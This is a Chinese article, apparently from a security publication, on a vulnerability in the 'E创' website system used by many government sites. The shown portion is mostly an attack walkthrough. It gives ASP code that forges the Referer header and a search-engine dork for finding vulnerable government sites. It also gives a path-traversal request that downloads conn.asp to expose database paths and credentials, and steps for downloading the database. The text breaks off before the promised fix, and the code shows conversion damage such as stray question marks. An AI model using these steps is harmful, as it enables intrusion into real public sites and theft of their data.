政府网站谨防因E创漏洞被攻击.docVIP

政府网站谨防因E创漏洞被攻击 核心提示：“E创网站系统”是政府站点通用的建站模板系统，最近E创爆出新漏洞，采用该系统的政府网站将面临者攻击的危险。本文重在分析漏洞原因，解析攻击利用过程，并给出解决办法…… 　　 　　“E创网站系统”是政府站点通用的建站模板系统，几乎成了政府建站首先模板系统，占了相当大的市场份额。最近，E创爆出新漏洞，采用该系统的政府网站将面临者攻击的危险。笔者写这篇文章重在分析漏洞原因，解析攻击利用过程，并给出解决办法。以期采用该系统的网站提高警惕，尽快修复漏洞。 　　　1、漏洞分析 　　down.asp是E创系统的防盗链文件，其关键代码如图1： 　　 　　HTTP_REFERER是是header的一部分，当浏览器向web服务器发送请求的时候会带上Referer，告诉服务器该请求是从哪个页面链接过来的，服务器籍此可以获得一些信息用于处理。Request.ServerVariables(HTTP_REFERER)的作用就是服务器获取链接的来源，然后与Request.ServerVariables(SERVER_NAME)获得的服务器名进行比较看看去爱那个8个字符是否相同，从而判断该链接是否来源于本服务器，以确定是否是“盗链”。 　　由于服务器对于HTTP_REFERER没有进行过滤，因此可以利用Microsoft.XMLHTTP组件伪造Referer，绕过E创网站系统down.asp的防盗链限制，关键代码为： 　　Dim?oXMLHttp,oStream,SourceCode,action,weburl,savefile? 　　action=Request(action)? 　　weburl=Request(weburl)? 　　savefile=Request(savefile)? 　　Function?E_0Day()? 　　Set?oXMLHttp?=?Server.CreateObject(MSXML2.XMLHTTP)? 　　With?oXMLHttp? 　　.Open?Get,?weburl,?False? 　　.setRequestHeader?Referer,mid(weburl,1,InStr(8,weburl,/)-1)? 　　Response.Write?mid(weburl,1,InStr(8,weburl,/)-1)? 　　.Send? 　　End?With? 　　核心代码.setRequestHeader?Referer,mid(weburl,1,InStr(8,weburl,/)-1)对客户端提交的weburl进行切分构造Referer。最后把这个构造的Referer提交给down.asp文件可以实现下载任意文件。有了核心代码然后以此为基础构造一个提交页面。(图2) 　　 　　当然攻击者最感兴趣的是Conn.asp文件，因为该文件是数据库连接文件。在该文件中记录了采用的数据库类型(ACCESS或者SQL)：对于ACCESS数据库可以看到数据库的路径及其名称，从而可以确定数据库的URL地址然后下载数据库;如果是SQL数据库，则可以看到数据库的连接用户和密码，然后利用类似SQL连接器的工具连接服务器。 2、入侵解析 　　(1).部署环境 　　由于提交页面是asp代码，因此需要部署asp运行环境。一般情况下，攻击者会利用IIS部署一个Web站点然后启用“Active?Server?Pages”扩展即可，当然攻击者也会利用支持asp的空间实施欺骗提交。 　　(2).站点搜索 　　在Google、百度等搜索引擎中输入“inurl:E_readnews.asp”进行搜索即可得到使用E创网站系统的网站。当然，还可以在后面加上其它的关键词进行更精确的搜索。笔者在Google中搜索结果有206,000个，将近有80%的是后缀为的政府网站，如果加上后缀的网站，政府网站的数量绝对超过85%。(图3) 　　 　　(3).下载Conn.asp 　　从搜索结果中复制类似http://www.***./wfqzf/E_ReadNews.asp?NewsID=914的网址，然后将“E_ReadNews.asp?NewsID=914”替换为“down.asp?filename=../conn.asp%20”通提交页面提交即可显示出conn.asp文件的内容。在此，站点的数据库信息一目了然。(图4) 　　 　　(4).下载数据库 　　E创有Access和SQL两个版本，以Access数据库为例可以看到Conn.asp文件中有类似 　　DB?=?DataBases/###sqq2008#.mdb这样的语句，这就是数据库的路径和地址。然后结合网站地址确定数据库的URL地址，通过下载工具就可以将数据库